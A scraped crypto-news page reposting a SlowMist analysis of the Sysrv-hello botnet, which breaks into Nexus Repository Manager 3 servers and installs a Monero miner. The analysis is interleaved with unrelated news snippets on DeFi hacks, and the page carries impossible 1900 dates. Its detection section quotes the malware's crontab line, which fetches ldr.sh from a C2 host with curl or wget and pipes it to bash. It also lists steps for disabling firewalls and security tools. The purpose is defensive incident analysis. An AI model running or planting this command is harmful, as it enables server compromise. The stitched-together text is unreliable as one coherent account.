買以太坊 買以太坊
Ctrl+D 買以太坊
ads
首頁 > DYDX > Info

SDT:慢霧:技術拆解 Sysrv-hello 僵尸網絡入侵原理_SWAP

Author:

Time:1900/1/1 0:00:00

攻擊路徑

Sysrv-hello僵尸網絡對云上NexusRepositoryManager3存在默認帳號密碼的服務器進行攻擊,Maven私服部署會用到NexusRepositoryManager3,由于Maven是個流行服務,所以也給了Sysrv-hello僵尸網絡的大范圍感染機會。

當NexusRepositoryManager3服務對外網開放且存在默認賬號密碼時,Sysrv-hello就可以直接掃描入侵,利用NexusRepositoryManager3的Tasks功能模塊直接運行惡意腳本達到入侵服務器的目的。

慢霧:靚號黑客已獲取到ParaSwap Deployer和QANplatform Deployer私鑰權限:10月11日消息,據慢霧區情報,靚號黑客地址之一(0xf358..7036)已經獲取到ParaSwap Deployer和QANplatform Deployer私鑰權限。黑客從ParaSwap Deployer地址獲取到約1千美元,并在QANplatform Deployer地址做了轉入轉出測試。慢霧MistTrack對0xf358..7036分析后發現,黑客同樣盜取了The SolaVerse Deployer及其他多個靚號的資金。截止目前,黑客已經接收到超過17萬美元的資金,資金沒有進一步轉移,地址痕跡有Uniswap V3、Curve、TraderJoe,PancakeSwap、OpenSea和Matcha。慢霧MistTrack將持續監控黑客地址并分析相關痕跡。[2022/10/11 10:31:05]

入侵到服務器后會自動下載執行ldr.sh文件,該文件主要功能:1.禁用Linux服務器防火墻(ufw)及清空iptables2.刪除aliyun、yunjing等主機安全軟件3.禁用apparmor、selinux、watchdog等安全機制4.刪除其他競品5.下載門羅幣挖礦程序進行挖礦,文件與進程名為network016.下載第二個木馬sysrv進行更高級操作7.在crontab里加上尾巴

慢霧:GenomesDAO被黑簡析:據慢霧區hacktivist消息,MATIC上@GenomesDAO項目遭受黑客攻擊,導致其LPSTAKING合約中資金被非預期的取出。慢霧安全團隊進行分析有以下原因:

1.由于GenomesDAO的LPSTAKING合約的initialized函數公開可調用且無權限與不可能重復初始化限制,攻擊者利用initialized函數將合約的stakingToken設置為攻擊者創建的虛假LP代幣。

2.隨后攻擊者通過stake函數進行虛假LP代幣的抵押操作,以獲得大量的LPSTAKING抵押憑證。

3.獲得憑證后再次通過initialized函數將合約的stakingToken設置為原先真是的LP代幣,隨后通過withdraw函數銷毀LPSTAKING憑證獲取合約中真實的LP抵押物。

4.最后將LP發送至DEX中移除流動性獲利。

本次事件是因為GenomesDAO的LPSTAKING合約可被任意重復初始化設置關鍵參數而導致合約中的抵押物被惡意耗盡。[2022/8/7 12:07:06]

第二個木馬sysrv的主要功能:1.確保門羅幣挖礦程序network01正常運行2.進行蠕蟲傳播,隨機掃描其他IP服務,同樣進行NexusRepositoryManager3漏洞利用,同時也會嘗試入侵MySQL、Tomcat、WebLogic等服務

慢霧:Inverse Finance遭遇閃電貸攻擊簡析:據慢霧安全團隊鏈上情報,Inverse Finance遭遇閃電貸攻擊,損失53.2445WBTC和99,976.29USDT。慢霧安全團隊以簡訊的形式將攻擊原理分享如下:

1.攻擊者先從AAVE閃電貸借出27,000WBTC,然后存225WBTC到CurveUSDT-WETH-WBTC的池子獲得5,375.5個crv3crypto和4,906.7yvCurve-3Crypto,隨后攻擊者把獲得的2個憑證存入Inverse Finance獲得245,337.73個存款憑證anYvCrv3Crypto。

2.接下來攻擊者在CurveUSDT-WETH-WBTC的池子進行了一次swap,用26,775個WBTC兌換出了75,403,376.18USDT,由于anYvCrv3Crypto的存款憑證使用的價格計算合約除了采用Chainlink的喂價之外還會根據CurveUSDT-WETH-WBTC的池子的WBTC,WETH,USDT的實時余額變化進行計算所以在攻擊者進行swap之后anYvCrv3Crypto的價格被拉高從而導致攻擊者可以從合約中借出超額的10,133,949.1個DOLA。

3.借貸完DOLA之后攻擊者在把第二步獲取的75,403,376.18USDT再次swap成26,626.4個WBTC,攻擊者在把10,133,949.1DOLAswap成9,881,355個3crv,之后攻擊者通過移除3crv的流動性獲得10,099,976.2個USDT。

4.最后攻擊者把去除流動性的10,000,000個USDTswap成451.0個WBT,歸還閃電貸獲利離場。

針對該事件,慢霧給出以下防范建議:本次攻擊的原因主要在于使用了不安全的預言機來計算LP價格,慢霧安全團隊建議可以參考Alpha Finance關于獲取公平LP價格的方法。[2022/6/16 4:32:58]

自查方法

進程:network01sysrv

文件:/tmp/network01/tmp/sysrv/tmp/flag.txt

crontab:echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-

端口:52013

存在以上這些,停止備份樣本后刪除。

加固建議

刪除NexusRepositoryManager3Tasks里的惡意代碼NexusRepositoryManager3嚴禁外網訪問,嚴禁默認賬號密碼NexusRepositoryManager3升級為最新版本被入侵服務器備份重要數據后,重配置或重做檢查被入侵服務器是否存在直接訪問生產網其他服務的能力,存在則在生產網其他服務所在的服務器上進一步分析是否有異常免責聲明:作為區塊鏈信息平臺,本站所發布文章僅代表作者個人觀點,與鏈聞ChainNews立場無關。文章內的信息、意見等均僅供參考,并非作為或被視為實際投資建議。

本文來源于非小號媒體平臺:

慢霧科技

現已在非小號資訊平臺發布68篇作品,

非小號開放平臺歡迎幣圈作者入駐

入駐指南:

/apply_guide/

本文網址:

/news/9606255.html

免責聲明:

1.資訊內容不構成投資建議,投資者應獨立決策并自行承擔風險

2.本文版權歸屬原作所有,僅代表作者本人觀點,不代表非小號的觀點或立場

上一篇:

深入解析MakeDao在新周期里的機遇和風險

Tags:SWAPWBTBTCSDTMiQiSwapAWBTC幣lbtc幣前景比特幣價格今日行情usdt

DYDX
ITM:ZeroSwap (ZEE)上線福利,充值交易贏15,000 USDT獎勵_TMA

親愛的BitMax用戶:?? ?? BitMax將于北京時間1月25日22:00上線ZEE/USDT交易對,現充提已開啟.

1900/1/1 0:00:00
300:炒幣教父1.24:比特幣看漲勢頭已減弱 牛市何在?_比特幣目前市值

轉眼間,中國的2020年即將過去。很多朋友依舊認為2021年依舊還是對于比特幣充滿希望的一年,在2020年下半年的比特幣走勢依舊可以看出可能再次創造新高.

1900/1/1 0:00:00
SDT:十分鐘玩轉CYC旋風協議教程_IOT

CYC是旋風協議的原生通證,有機的激勵匿名提供者,流動性提供者和用戶。CYC通證沒有投資方、沒有團隊預挖,而是全部分配給為旋風協議做出貢獻的社區和用戶.

1900/1/1 0:00:00
AXL:景德鎮核心要點_RAK

鑒于國內外疫情現狀,“雙節”期間,避免出境和前往中、高風險地區。倡導非必要不離景,非必要不出境,建議市民朋友在景過節。如需出行務必提前了解途經地和目的地疫情形勢和防控政策。 進入景德鎮.

1900/1/1 0:00:00
BTC:比特獵手:比特幣28850上方趨勢看多 以太有較大回調需求_比特幣鉆石是主流幣嗎

當理解了行情的不完美,不因大起大落而激動,不為錯失機會而后悔,而且這些改變,都是在自己內心世界不動聲色的完成時,才能真正懂得了交易的真諦.

1900/1/1 0:00:00
以太坊:炒幣教父1.25:機構做大蛋糕的同時 你能抓住賺錢的機會嗎?_區塊鏈專業就業前景

在今日凌晨比特幣價格一度下跌至31000美元以下,直至下午才回調至33000上方。那么又會有人問到教父了,不是說機構參與進來都要做大這個蛋糕嗎,最近的幣價著實讓做現貨的朋友雪上加霜.

1900/1/1 0:00:00
ads